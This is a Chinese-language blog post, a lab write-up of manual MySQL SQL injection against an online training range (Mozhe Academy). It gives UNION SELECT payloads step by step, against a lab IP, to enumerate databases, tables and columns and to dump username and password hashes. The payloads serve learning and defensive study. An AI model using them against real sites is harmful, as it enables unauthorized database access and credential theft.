<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <!-- Google Tag Manager -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-T42TL8W');</script>
<!-- End Google Tag Manager -->
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 4.1.1">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">


<script id="hexo-configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    hostname: new URL('http://yoursite.com').hostname,
    root: '/',
    scheme: 'Pisces',
    version: '7.6.0',
    exturl: false,
    sidebar: {"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},
    copycode: {"enable":false,"show_result":false,"style":null},
    back2top: {"enable":true,"sidebar":false,"scrollpercent":false},
    bookmark: {"enable":false,"color":"#222","save":"auto"},
    fancybox: false,
    mediumzoom: false,
    lazyload: false,
    pangu: false,
    comments: {"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},
    algolia: {
      appID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    },
    localsearch: {"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},
    path: '',
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}
  };
</script>

  <meta name="description" content="一、Mysql介绍 MySQL 是最流行的关系型数据库管理系统，已被Oracle 收购，推荐使用Maria DB,MariaDB是一个采用Maria存储引擎的MySQL分支版本.  本章用到的函数以及关键字：  database()      &#x2F;&#x2F;查看当前数据库名称 union关键字     &#x2F;&#x2F;联合查询 order by   &#x2F;&#x2F;排序 group_concat() &#x2F;&#x2F;合并结果集 limi &#x2F;&#x2F;">
<meta property="og:type" content="article">
<meta property="og:title" content="SQL注入(一)-mysql手工注入漏铜">
<meta property="og:url" content="http://yoursite.com/2019/12/24/SQL%E6%B3%A8%E5%85%A5-%E4%B8%80-mysql%E6%89%8B%E5%B7%A5%E6%B3%A8%E5%85%A5%E6%BC%8F%E9%93%9C/index.html">
<meta property="og:site_name" content="菜的学习笔记~">
<meta property="og:description" content="一、Mysql介绍 MySQL 是最流行的关系型数据库管理系统，已被Oracle 收购，推荐使用Maria DB,MariaDB是一个采用Maria存储引擎的MySQL分支版本.  本章用到的函数以及关键字：  database()      &#x2F;&#x2F;查看当前数据库名称 union关键字     &#x2F;&#x2F;联合查询 order by   &#x2F;&#x2F;排序 group_concat() &#x2F;&#x2F;合并结果集 limi &#x2F;&#x2F;">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://yoursite.com/2019/12/24/img/SQL%E6%B3%A8%E5%85%A5(%E4%B8%80)-%E6%89%8B%E5%B7%A5%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9Emysql.png">
<meta property="og:image" content="http://yoursite.com/2019/12/24/img/SQL%E6%B3%A8%E5%85%A5(%E4%B8%80)-%E5%88%A4%E6%96%AD%E6%B3%A8%E5%85%A5%E7%B1%BB%E5%9E%8B.png">
<meta property="og:image" content="http://yoursite.com/2019/12/24/img/SQL%E6%B3%A8%E5%85%A5(%E4%B8%80)-%E7%8C%9C%E8%A7%A3%E5%AD%97%E6%AE%B5%E6%95%B0.png">
<meta property="og:image" content="http://yoursite.com/2019/12/24/img/SQL%E6%B3%A8%E5%85%A5(%E4%B8%80)-union%E8%81%94%E5%90%88%E6%9F%A5%E8%AF%A21.png">
<meta property="og:image" content="http://yoursite.com/2019/12/24/img/SQL%E6%B3%A8%E5%85%A5(%E4%B8%80)-%E8%8E%B7%E5%8F%96%E6%95%B0%E6%8D%AE%E5%BA%93%E5%90%8D%E7%A7%B0.png">
<meta property="og:image" content="http://yoursite.com/2019/12/24/img/SQL%E6%B3%A8%E5%85%A5(%E4%B8%80)-%E8%8E%B7%E5%8F%96%E6%95%B0%E6%8D%AE%E5%BA%93%E8%A1%A8%E5%90%8D.png">
<meta property="og:image" content="http://yoursite.com/2019/12/24/img/SQL%E6%B3%A8%E5%85%A5(%E4%B8%80)-%E8%8E%B7%E5%8F%96%E8%A1%A8%E5%85%83%E6%95%B0%E6%8D%AE.png">
<meta property="og:image" content="http://yoursite.com/2019/12/24/img/SQL%E6%B3%A8%E5%85%A5(%E4%B8%80)-%E8%8E%B7%E5%8F%96%E8%B4%A6%E5%8F%B7%E5%92%8C%E5%AF%86%E7%A0%81.png">
<meta property="article:published_time" content="2019-12-24T14:08:48.000Z">
<meta property="article:modified_time" content="2019-12-24T14:34:53.025Z">
<meta property="article:author" content="Fym">
<meta property="article:tag" content="SQL注入">
<meta property="article:tag" content="渗透">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://yoursite.com/2019/12/24/img/SQL%E6%B3%A8%E5%85%A5(%E4%B8%80)-%E6%89%8B%E5%B7%A5%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9Emysql.png">

<link rel="canonical" href="http://yoursite.com/2019/12/24/SQL%E6%B3%A8%E5%85%A5-%E4%B8%80-mysql%E6%89%8B%E5%B7%A5%E6%B3%A8%E5%85%A5%E6%BC%8F%E9%93%9C/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome: false,
    isPost: true
  };
</script>

  <title>SQL注入(一)-mysql手工注入漏铜 | 菜的学习笔记~</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <!-- Google Tag Manager (noscript) -->
<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-T42TL8W"
height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<!-- End Google Tag Manager (noscript) -->
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-meta">

    <div>
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">菜的学习笔记~</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
  </div>

  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>
</div>


<nav class="site-nav">
  
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>首页</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-fw fa-archive"></i>归档</a>

  </li>
  </ul>

</nav>
</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content">
            

  <div class="posts-expand">
      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block " lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/12/24/SQL%E6%B3%A8%E5%85%A5-%E4%B8%80-mysql%E6%89%8B%E5%B7%A5%E6%B3%A8%E5%85%A5%E6%BC%8F%E9%93%9C/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Fym">
      <meta itemprop="description" content="自学真难~    T.T">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="菜的学习笔记~">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          SQL注入(一)-mysql手工注入漏铜
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2019-12-24 22:08:48 / 修改时间：22:34:53" itemprop="dateCreated datePublished" datetime="2019-12-24T22:08:48+08:00">2019-12-24</time>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h2 id="一、Mysql介绍"><a href="#一、Mysql介绍" class="headerlink" title="一、Mysql介绍"></a>一、Mysql介绍</h2><blockquote>
<p>MySQL 是最流行的关系型数据库管理系统，已被Oracle 收购，推荐使用Maria DB,MariaDB是一个采用Maria存储引擎的MySQL分支版本.</p>
</blockquote>
<p>本章用到的函数以及关键字：</p>
<ul>
<li>database()      //查看当前数据库名称</li>
<li>union关键字     //联合查询</li>
<li>order by   //排序</li>
<li>group_concat() //合并结果集</li>
<li>limi //常用与分页</li>
</ul>
<h2 id="二、漏洞原理"><a href="#二、漏洞原理" class="headerlink" title="二、漏洞原理"></a>二、漏洞原理</h2><p>WEB后台对前端提交到后台的用户输入参数没有做限制，将会导致此漏洞。</p>
<h3 id="举例"><a href="#举例" class="headerlink" title="举例"></a>举例</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">预想中的用户输入：</span><br><span class="line">    1. 前端提交查询一条编号是1的新闻</span><br><span class="line">    2. 此时浏览器发出</span><br><span class="line">        http:\\xxx.com?id&#x3D;1</span><br><span class="line">    3. 后台程序接收到后,取到id对应的1,开始拼装SQL语句</span><br><span class="line">        select title,content  from news where id  &#x3D; 1 &#x2F;&#x2F; 此时的这个1是从前端获取的</span><br><span class="line">    4. 后端返回前端 新闻 内容</span><br><span class="line">恶意用户输入(此时想知道数据库名称）：</span><br><span class="line">    1. 既然后端未对前端做任何处理,就表示前端可以控制整个查询语句</span><br><span class="line">    2. 前端构造恶意id的值</span><br><span class="line">        http:\\xxx.com?id&#x3D;-1 union select 1,(database()),3</span><br><span class="line">    3. 此时后台拼装的SQL查询语句就是</span><br><span class="line">        select title,content  from news where id  &#x3D; -1 union select 1,(database()),3</span><br><span class="line">    4. 得到结果当前数据库名称</span><br></pre></td></tr></table></figure>

<h2 id="三、靶场实战"><a href="#三、靶场实战" class="headerlink" title="三、靶场实战"></a>三、靶场实战</h2><blockquote>
<p>此处使用的 <strong>墨者学院</strong> 的在线靶场</p>
</blockquote>
<h3 id="1-开启靶场"><a href="#1-开启靶场" class="headerlink" title="1. 开启靶场"></a>1. 开启靶场</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">懒得截图了，入门-&gt;web安全-&gt;SQL注入-&gt;SQL手工注入漏洞测试(MySQL数据库)</span><br></pre></td></tr></table></figure>

<h3 id="2-寻找注入点"><a href="#2-寻找注入点" class="headerlink" title="2. 寻找注入点"></a>2. 寻找注入点</h3><p><img src="../img/SQL%E6%B3%A8%E5%85%A5(%E4%B8%80)-%E6%89%8B%E5%B7%A5%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9Emysql.png" alt="SQL注入(一)-手工注入漏洞mysql.png"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">图中箭头所指处为注入点</span><br></pre></td></tr></table></figure>

<h3 id="3-判断注入类型"><a href="#3-判断注入类型" class="headerlink" title="3. 判断注入类型"></a>3. 判断注入类型</h3><p><img src="../img/SQL%E6%B3%A8%E5%85%A5(%E4%B8%80)-%E5%88%A4%E6%96%AD%E6%B3%A8%E5%85%A5%E7%B1%BB%E5%9E%8B.png" alt="判断注入类型"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">基本套路就是看页面显示</span><br><span class="line">    1. id &#x3D; 1&#39;  &#x2F;&#x2F;页面显示空白没有格式  可能是数据库报错，但是没有回显</span><br><span class="line">    2. and 1 &#x3D; 2 和  and  1 &#x3D; 1 &#x2F;&#x2F;查看页面是否只有格式没有数据</span><br></pre></td></tr></table></figure>

<h3 id="4-获取目标后台的SQL语句中的select-查询了多少个字段"><a href="#4-获取目标后台的SQL语句中的select-查询了多少个字段" class="headerlink" title="4. 获取目标后台的SQL语句中的select 查询了多少个字段"></a>4. 获取目标后台的SQL语句中的select 查询了多少个字段</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">目的：在联合查询时需要用到</span><br><span class="line">使用 order by 1 </span><br><span class="line">        </span><br><span class="line">    order by   &#x2F;&#x2F; 是用来结果集排序的</span><br><span class="line">    order by 1 &#x2F;&#x2F; 表示 对结果集 也就是根据 select 所查询的字段中的第一个进行排序</span><br><span class="line">    假设：</span><br><span class="line">        select a,b,c,d from xxx id &#x3D; 1 </span><br><span class="line">               1 2 3 4</span><br><span class="line">    此时order by 后面就可以写  1 2 3 4 ,表示根据对应的字段来排序</span><br><span class="line">    select a,b,c,d from xxx order by 1 &#x2F;&#x2F;表示根据对应的字段a来排序</span><br><span class="line">    select a,b,c,d from xxx order by 2 &#x2F;&#x2F;表示根据对应的字段b来排序</span><br><span class="line">    ...</span><br><span class="line"></span><br><span class="line">    当order by 后面的数字没有对应的列时，就会报错，有些报错会提示出来“没有对应的列”</span><br><span class="line">    所以，只需要一直加到页面报错或者不显示内容时，此时的数字-1就是我们猜解出来的字段数</span><br></pre></td></tr></table></figure>
<p><img src="../img/SQL%E6%B3%A8%E5%85%A5(%E4%B8%80)-%E7%8C%9C%E8%A7%A3%E5%AD%97%E6%AE%B5%E6%95%B0.png" alt="猜解字段数"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;219.153.49.228:40947&#x2F;new_list.php?id&#x3D;1 orde by 5</span><br></pre></td></tr></table></figure>

<h3 id="5-使用联合查询，查看页面是那个字段在显示数据"><a href="#5-使用联合查询，查看页面是那个字段在显示数据" class="headerlink" title="5. 使用联合查询，查看页面是那个字段在显示数据"></a>5. 使用联合查询，查看页面是那个字段在显示数据</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">目的：用于将我们要查询的内容展示在页面上</span><br><span class="line">使用 union select 1,2,3,4</span><br><span class="line"></span><br><span class="line">    union           &#x2F;&#x2F;是用来连接两个查询语句并将结果集合并在一起且去重</span><br><span class="line">    如： select a,b,c from xxx union select 1,2,3,4</span><br><span class="line">    </span><br><span class="line">    union select 1,2,3,4   &#x2F;&#x2F;后面select 表示查询1,2,3,4  不用跟from 后面内容</span><br><span class="line">    这里的1,2,3,4 就是上面order by才出来的数字</span><br><span class="line"></span><br><span class="line">    假设目标站点sql：</span><br><span class="line">        select a,b,c,d from xxx id &#x3D; 1</span><br><span class="line">    通过我们构造方法后：</span><br><span class="line">        select a,b,c,d from xxx id &#x3D; 1 union select 1,2,3,4</span><br></pre></td></tr></table></figure>
<blockquote>
<p>后端的执行结果(我们是看不到的)</p>
</blockquote>
<table>
<thead>
<tr>
<th align="center">a</th>
<th align="center">b</th>
<th align="center">c</th>
<th align="center">d</th>
</tr>
</thead>
<tbody><tr>
<td align="center">A</td>
<td align="center">B</td>
<td align="center">C</td>
<td align="center">D</td>
</tr>
<tr>
<td align="center">1</td>
<td align="center">2</td>
<td align="center">3</td>
<td align="center">4</td>
</tr>
</tbody></table>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">1. 大写字母是union前面id&#x3D;1的查询语句查询出来的数据</span><br><span class="line">2. 数字是union后面查询语句查出来的数据，因为没有写表，所以就是1,2,3,4</span><br><span class="line">3. 此时页面应该是没有任何变化的，因为后端会从直接结果里面取第一条出来，所以此时可以想办法让数据只有union后面的查询语句，就是让union前面的查询语句的查询结果为空</span><br><span class="line">4. 在union前面可以加 and 1 &#x3D; 2 让第一条语句一直为false  或者  把id的值等于一个不存在值</span><br><span class="line">5. 构造后代码：-1 union select 1,2,3,4    </span><br><span class="line">6. 此时来查看效果</span><br></pre></td></tr></table></figure>
<p><img src="../img/SQL%E6%B3%A8%E5%85%A5(%E4%B8%80)-union%E8%81%94%E5%90%88%E6%9F%A5%E8%AF%A21.png" alt="union联合查询1"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">此时可以看到2,3位置的数据可以被显示出来,那我们就在2,3任选一处继续 &#x2F;&#x2F;union 1,2,3,4,</span><br></pre></td></tr></table></figure>

<h3 id="6-使用联合查询，查询数据"><a href="#6-使用联合查询，查询数据" class="headerlink" title="6. 使用联合查询，查询数据"></a>6. 使用联合查询，查询数据</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">目的：获取最终数据，账号和密码，进而登录系统获取key</span><br><span class="line"></span><br><span class="line">在union 后面的查询中使用子查询</span><br><span class="line"></span><br><span class="line">    例如：</span><br><span class="line">        获取数据库信息 </span><br><span class="line">        -1 union select 1,2,(select database()),4  &#x2F;&#x2F;此处把3 替换成一个子查询语句,子查询结果集只能是一个单独的结果集</span><br><span class="line">        或者</span><br><span class="line">        -1 union select 1,2,(database()),4 </span><br><span class="line">        &#x2F;&#x2F;database()是一个数据库自带函数</span><br></pre></td></tr></table></figure>

<blockquote>
<ol>
<li>获取数据库名称</li>
</ol>
</blockquote>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload: http:&#x2F;&#x2F;219.153.49.228:40947&#x2F;new_list.php?id&#x3D;-1 union select 1,2,(database()),4</span><br></pre></td></tr></table></figure>

<p><img src="../img/SQL%E6%B3%A8%E5%85%A5(%E4%B8%80)-%E8%8E%B7%E5%8F%96%E6%95%B0%E6%8D%AE%E5%BA%93%E5%90%8D%E7%A7%B0.png" alt="获取数据库名称"></p>
<blockquote>
<ol start="2">
<li>获取当前数据库所有表</li>
</ol>
</blockquote>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">payload: http:&#x2F;&#x2F;219.153.49.228:40947&#x2F;new_list.php?id&#x3D;-1 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema &#x3D; database()),4</span><br><span class="line"></span><br><span class="line">select table_name from information_schema.tables where table_schema&#x3D;database() 解释：</span><br><span class="line">Mysql数据库中有一个库是专门存储元数据等相关数据的库，可以通过这个库来查询我们想要的信息，比如：</span><br><span class="line">tables  &#x2F;&#x2F;这张表保存了 mysql库中所有的数据库和库对应的表信息</span><br><span class="line">columns &#x2F;&#x2F;这张表保存了 mysql表中所有的元数据等信息</span><br><span class="line">此时的意思就是我要查询information_schema.tables这个表中table_schema这个字段是database()获取到的当前数据库名称的所有表名</span><br><span class="line"></span><br><span class="line">详细去百度搜索</span><br></pre></td></tr></table></figure>

<p><img src="../img/SQL%E6%B3%A8%E5%85%A5(%E4%B8%80)-%E8%8E%B7%E5%8F%96%E6%95%B0%E6%8D%AE%E5%BA%93%E8%A1%A8%E5%90%8D.png" alt="获取数据库表名"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">结果：</span><br><span class="line">StormGroup_member</span><br><span class="line">notice</span><br></pre></td></tr></table></figure>

<blockquote>
<ol start="3">
<li>获取数据某个表所有字段(元数据)</li>
</ol>
</blockquote>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">payload: http:&#x2F;&#x2F;219.153.49.228:46485&#x2F;new_list.php?id&#x3D;-1 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name &#x3D; &quot;StormGroup_member&quot;),4</span><br><span class="line">大致意思同上</span><br><span class="line">只是表换成了columns</span><br><span class="line">同时指定了一个明确的表名,是通过上一步获取到的表明中的一个</span><br></pre></td></tr></table></figure>

<p><img src="../img/SQL%E6%B3%A8%E5%85%A5(%E4%B8%80)-%E8%8E%B7%E5%8F%96%E8%A1%A8%E5%85%83%E6%95%B0%E6%8D%AE.png" alt="获取表字段名"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">结果：</span><br><span class="line">id</span><br><span class="line">name            &#x2F;&#x2F;我猜是用户名</span><br><span class="line">password        &#x2F;&#x2F;我猜是密码</span><br><span class="line">status</span><br></pre></td></tr></table></figure>

<blockquote>
<ol start="4">
<li>获取对应字段数据</li>
</ol>
</blockquote>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">payload: http:&#x2F;&#x2F;219.153.49.228:46485&#x2F;new_list.php?id&#x3D;-1 union select 1,2,(select group_concat(name,&#39;-&#39;,password) from StormGroup_member),4</span><br><span class="line"></span><br><span class="line">此时表名有了 StormGroup_member  要查的字段也有了 name,password</span><br><span class="line">只需要将SQL查询直接带入就可以了</span><br></pre></td></tr></table></figure>
<p><img src="../img/SQL%E6%B3%A8%E5%85%A5(%E4%B8%80)-%E8%8E%B7%E5%8F%96%E8%B4%A6%E5%8F%B7%E5%92%8C%E5%AF%86%E7%A0%81.png" alt="获取表字段名"></p>
<h3 id="7-MD5解密"><a href="#7-MD5解密" class="headerlink" title="7. MD5解密"></a>7. MD5解密</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">不做记录</span><br></pre></td></tr></table></figure>

<h3 id="8-登录系统，获取Key"><a href="#8-登录系统，获取Key" class="headerlink" title="8. 登录系统，获取Key"></a>8. 登录系统，获取Key</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">不做记录</span><br></pre></td></tr></table></figure>

<h2 id="最后总结"><a href="#最后总结" class="headerlink" title="最后总结"></a>最后总结</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">没啥好总结的， 就是普通SQL查询语句的应用，会SQL就可以了</span><br><span class="line">古德拜~</span><br></pre></td></tr></table></figure>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/SQL%E6%B3%A8%E5%85%A5/" rel="tag"># SQL注入</a>
              <a href="/tags/%E6%B8%97%E9%80%8F/" rel="tag"># 渗透</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2019/12/20/%E8%AE%B0%E5%BD%95%E5%AD%A6%E4%B9%A0%E5%92%8C%E7%94%9F%E6%B4%BB/" rel="prev" title="记录学习笔记和生活">
      <i class="fa fa-chevron-left"></i> 记录学习笔记和生活
    </a></div>
      <div class="post-nav-item"></div>
    </div>
      </footer>
    
  </article>
  
  
  

  </div>


          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let activeClass = CONFIG.comments.activeClass;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#一、Mysql介绍"><span class="nav-number">1.</span> <span class="nav-text">一、Mysql介绍</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#二、漏洞原理"><span class="nav-number">2.</span> <span class="nav-text">二、漏洞原理</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#举例"><span class="nav-number">2.1.</span> <span class="nav-text">举例</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#三、靶场实战"><span class="nav-number">3.</span> <span class="nav-text">三、靶场实战</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-开启靶场"><span class="nav-number">3.1.</span> <span class="nav-text">1. 开启靶场</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-寻找注入点"><span class="nav-number">3.2.</span> <span class="nav-text">2. 寻找注入点</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-判断注入类型"><span class="nav-number">3.3.</span> <span class="nav-text">3. 判断注入类型</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4-获取目标后台的SQL语句中的select-查询了多少个字段"><span class="nav-number">3.4.</span> <span class="nav-text">4. 获取目标后台的SQL语句中的select 查询了多少个字段</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#5-使用联合查询，查看页面是那个字段在显示数据"><span class="nav-number">3.5.</span> <span class="nav-text">5. 使用联合查询，查看页面是那个字段在显示数据</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#6-使用联合查询，查询数据"><span class="nav-number">3.6.</span> <span class="nav-text">6. 使用联合查询，查询数据</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#7-MD5解密"><span class="nav-number">3.7.</span> <span class="nav-text">7. MD5解密</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#8-登录系统，获取Key"><span class="nav-number">3.8.</span> <span class="nav-text">8. 登录系统，获取Key</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#最后总结"><span class="nav-number">4.</span> <span class="nav-text">最后总结</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">Fym</p>
  <div class="site-description" itemprop="description">自学TM难~    T.T</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">2</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

<div class="copyright">
  
  &copy; 
